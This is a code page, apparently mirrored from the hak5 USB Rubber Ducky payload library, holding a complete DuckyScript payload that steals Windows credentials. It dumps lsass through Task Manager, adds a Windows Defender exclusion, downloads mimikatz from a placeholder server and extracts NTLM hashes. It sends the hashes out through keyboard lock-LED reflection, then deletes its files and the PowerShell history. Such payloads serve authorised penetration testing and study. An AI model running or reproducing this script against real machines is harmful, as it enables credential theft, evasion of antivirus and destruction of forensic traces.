Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/exfiltration/ExfiltrateWindowsCredentials/KeystrokeReflection/payload.txt
2971 views
1
REM Title: DuckyScript payload for data exfiltration using keystroke reflection

2
REM Author: jakobfriedl

3
ATTACKMODE HID

4


5
REM OS Detection to ensure the target is Windows

6
EXTENSION PASSIVE_WINDOWS_DETECT

7
    REM VERSION 1.1

8
    REM AUTHOR: Korben

9


10
    REM CONFIGURATION:

11
    DEFINE #MAX_WAIT 150

12
    DEFINE #CHECK_INTERVAL 20

13
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2

14
    DEFINE #NOT_WINDOWS 7

15


16
    $_OS = #NOT_WINDOWS

17


18
    VAR $MAX_TRIES = #MAX_WAIT

19
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))

20
        DELAY #CHECK_INTERVAL

21
        $MAX_TRIES = ($MAX_TRIES - 1)

22
    END_WHILE

23
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN

24
        $_OS = WINDOWS

25
    END_IF

26
END_EXTENSION

27


28
IF ($_OS != WINDOWS)                                                                                                                 

29
    LED_R                                                                                                                                       

30
    STOP_PAYLOAD 

31
END_IF

32


33
REM Define the URL of the server hosting the mimikatz executable

34
DEFINE #SERVER_URL http://XXX.XXX.XXX.XXX

35


36
DELAY 1000

37
LED_OFF

38
SAVE_HOST_KEYBOARD_LOCK_STATE

39
$_EXFIL_MODE_ENABLED = TRUE

40
$_EXFIL_LEDS_ENABLED = TRUE

41
REM Delete existing dump file

42
GUI r

43
DELAY 200

44
STRINGLN powershell "rm $env:TEMP\lsass.DMP"

45
DELAY 200

46


47
REM Create lsass-dump using the TaskManager

48
GUI r

49
DELAY 200

50
STRING taskmgr

51
CTRL-SHIFT ENTER

52
DELAY 500

53
ALT y

54
DELAY 500

55
DOWNARROW

56
DELAY 1000

57
STRING lsass

58
DELAY 500

59
SHIFT F10

60
$I = 0

61
WHILE ($I < 5) 

62
    UPARROW

63
    $I = ($I + 1)

64
END_WHILE

65
ENTER

66
DELAY 500

67
ENTER

68
ALT F4

69


70
REM Add exclusion path to the Windows Defender settings

71
GUI r

72
DELAY 200

73
STRING powershell.exe

74
CTRL-SHIFT ENTER

75
DELAY 500

76
ALT y

77
DELAY 500

78
STRINGLN if((Get-MpComputerStatus).RealTimeProtectionEnabled){Set-MpPreference -ExclusionPath $env:TEMP}

79


80
REM Download mimikatz.exe from webserver

81
STRINGLN wget #SERVER_URL/mimikatz.exe -o $env:TEMP\mimikatz.exe

82
DELAY 1000

83


84
REM Execute mimikatz and the necessary commands

85
STRINGLN cd $env:TEMP

86
STRINGLN .\mimikatz.exe "privilege::debug"

87
STRINGLN log exfiltration.log

88
STRINGLN sekurlsa::minidump lsass.DMP

89
STRINGLN sekurlsa::logonpasswords

90
DELAY 5000

91
CTRL c

92
DELAY 500

93


94
REM Format mimikatz-log for exfiltration

95
STRINGLN cat .\exfiltration.log | Select-String -Pattern "NTLM" -Context 2,0  | Get-Unique > credentials.txt

96


97
REM Exfiltration

98
REM Convert the data in credentials.txt to NUMLOCK and CAPSLOCK values and terminate with SCROLLLOCK

99
STRINGLN foreach($byte in $(cat $env:TEMP\credentials.txt -En by)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01) {if($byte -band $a){$o+='%{NUMLOCK}'} else{$o+='%{CAPSLOCK}'}}}; $o+='%{SCROLLLOCK}' 

100
DELAY 200

101


102
REM Reflect the keystrokes back to the USB Rubber Ducky

103
STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($o)

104
DELAY 200

105


106
REM SCROLLLOCK indicates that exfiltration has completed

107
WAIT_FOR_SCROLL_CHANGE

108
LED_G

109
$_EXFIL_MODE_ENABLED = FALSE

110
RESTORE_HOST_KEYBOARD_LOCK_STATE

111


112
REM Clean-up 

113
REM Remove files

114
STRINGLN rm $env:TEMP\lsass.DMP

115
STRINGLN rm $env:TEMP\mimikatz.exe

116
STRINGLN rm $env:TEMP\exfiltration.log

117
STRINGLN rm $env:TEMP\credentials.txt

118
REM Reset configurations

119
STRINGLN Remove-MpPreference -ExclusionPath $env:TEMP

120
REM Delete Powershell history

121
STRINGLN rm (Get-PSReadLineOption).HistorySavePath

122